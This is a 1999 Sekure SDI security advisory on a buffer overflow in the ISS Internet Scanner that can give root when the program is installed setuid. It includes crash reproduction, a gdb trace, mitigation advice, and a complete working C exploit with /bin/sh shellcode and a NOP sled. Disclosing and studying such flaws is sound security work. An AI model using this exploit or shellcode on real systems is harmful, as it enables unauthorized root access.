SDI.03-99.iss-scanner.txt

`  
  
Sekure SDI  
http://www.sekure.org  
---------------------------  
Brazilian Information Security Team  
  
  
-> Internet Scanner Buffer Overflow <-  
(SDI.03-99.iss-scanner)  
  
---  
complexity : medium  
critical level : medium  
---  
  
1. Introduction   
  
Internet Scanner (I.S) is a wide known tool to audit the security level  
of a certain network. It has a database which will assist in the detection of   
the commom security holes that may help an intruder to gain access or  
gather private information from the scanned host.  
  
During the checks, I.S. will run a set of procedures that requires  
privileges in the local host (root), so an ordinary user may not start a  
scan.   
  
Altough it's not the default configuration, it's commom, in certain  
cases, to set the suid bit to permit "root privileges" so the "audit" user,   
who does not have the necessary privileges, may execute a scan.  
  
A certain problem was found in the IS program during some tests in  
our lab. While by default it will not represent a thread, in the above  
situation (suid bit owned by root), it will become a security gap.  
  
  
2. I.S Flaw  
  
Internet Scan does not check bounds in some arguments it receives from  
the command line, which will cause a segmentation fault.  
  
sekure:~$ ./iss -D `perl -e "print 'A' x 2000"`  
Creating Directory /usr/local/iss/scans/s.199903241212  
# Time Stamp(2103): Signal - Segmentation Violation: (...)  
(..)  
ISS Scan was interrupted.  
Segmentation fault  
  
sekure:~$ ./iss -c `perl -e "print 'A' x 2000"`  
(...)  
Segmentation fault  
  
Let's check the return address:  
  
(gdb) run -D `perl -e "print 'A' x 2000"`  
Starting program: iss -D `perl -e "print 'A' x 2000"`  
(...)  
Program received signal SIGSEGV, Segmentation fault.  
0x41414141 in ?? ()  
(gdb)  
  
In this situation, we can reach the return address (which holds the  
place the program must return in the memory), so we may execute arbitrary  
commands, and adding the "suid bit" situation, it will be executed with root   
privileges.  
  
  
3. Who is vulnerable ?  
  
If you are running I.S using the SETUID bit to conceed root privileges  
to an ordinary user, then you ARE vulnerable to this attack.  
  
If you are using the DEFAULT configuration of I.S, you are NOT  
vulnerable.  
  
  
4. Fixing the situation  
  
The ISS which is the owner of I.S does not provide the source code along  
with the program, so we may not provide a quick patch.   
  
We advice you to remove the suid bit and contact the vendor for a  
correction.  
  
We also advice you to avoid the use of suid bit unless you are familiar  
with the purpose of the program.  
  
  
5. Exploiting the bug  
  
We believe information must be free available. If we don't provide the  
exploit script along with the information, someone else will do.   
  
We also know that people like to see with their own eyes to believe  
they are vulnerable. So here it is:  
  
------------- SDI-iss.c -----------------------------  
/*   
* Sekure SDI - http://www.sekure.org   
* Brazilian Information Security Team   
* By c0nd0r <[email protected]>  
*  
* . ..Internet Scanner (ISS) Buffer Overflow.. .   
* (read the original advisory at http://www.sekure.org/advisory.html)  
*   
* > This may not represent a thread if you are  
* > NOT using IS with setuid root  
*  
* This code is only for educational purposes.  
* ------------------------------  
* Instructions: After the compilation, execute it to get   
* a shell prompt with the $EGG in the environment.  
* tiazinha:~$ SDI-iss  
* bash$ ls -tarl iss  
* -rwsr-xr-x 1 root daemon 1691180 Dec 10 15:22 iss*  
* bash$ ./iss -c $EGG   
*   
* Creating Directory /usr/local/iss/scans/s.199903261158  
* id;  
* uid=666(condor) gid=100(deejay) euid=0(root) groups=12(mail)  
* -------------------------------  
* PS: the i/o descriptors are used by IS (stdin/stdout) as this is   
* just an example, I'll not worry about.   
*/  
  
char shellcode[]=  
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"  
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"  
"\x80\xe8\xdc\xff\xff\xff/bin/sh";  
  
#define ISS_HOME "/usr/local/iss"  
  
main ( int argc, char *argv[]) {  
char buff[2048], env[250];  
long addr;  
int x, y, offset=0, src;  
  
if (argc > 1) offset = atoi(argv[1]);  
  
for ( x = 0; x < (238-strlen(shellcode)); x++)   
buff[x] = 0x90;  
  
for ( y = 0; y < strlen(shellcode); y++, x++)  
buff[x] = shellcode[y];  
  
addr = (long) &src + offset;  
printf ( "SDI I.S. Exploit Code\n");  
printf ( "4 educational purpose only\n");  
printf ( "Please, go to ISS directory and run:\n");  
printf ( "./iss -c $EGG\n\n");  
  
/* the program mess with the stack so I prefer to set it   
by my own hands, no prob, just a little bit different */  
  
buff [x++] = 0x60;   
buff [x++] = 0xef;   
buff [x++] = 0xff;   
buff [x++] = 0xbf;   
/* it works fine in my slak3.5 box */  
  
buff[strlen(buff)] = '\0';  
  
snprintf ( env, sizeof(env), "ISS_HOME=%s", ISS_HOME);   
putenv ( env);  
bzero ( &env, sizeof(env));  
  
snprintf ( env, sizeof(env), "EGG=%s", buff);  
putenv ( env);  
system ( "/bin/sh");  
  
}  
--------------------- eof ------------------  
  
6. Contacts  
  
Sekure SDI  
http://www.sekure.org  
[email protected]  
  
This advisory has been written by SSC (Sekure SDI Secure Coding Group)  
http://ssc.sekure.org  
[email protected]  
  
Subscribe the Best of Security Brazil - mailing list  
http://bos.sekure.org  
[email protected]  
(the main language is portuguese but everybody is welcome)  
  
  
----  
written by c0nd0r  
[email protected]  
  
  
-condor  
www.sekure.org  
s e k u r e   
  
pgp key available at: http://condor.sekure.org/condor.asc  
`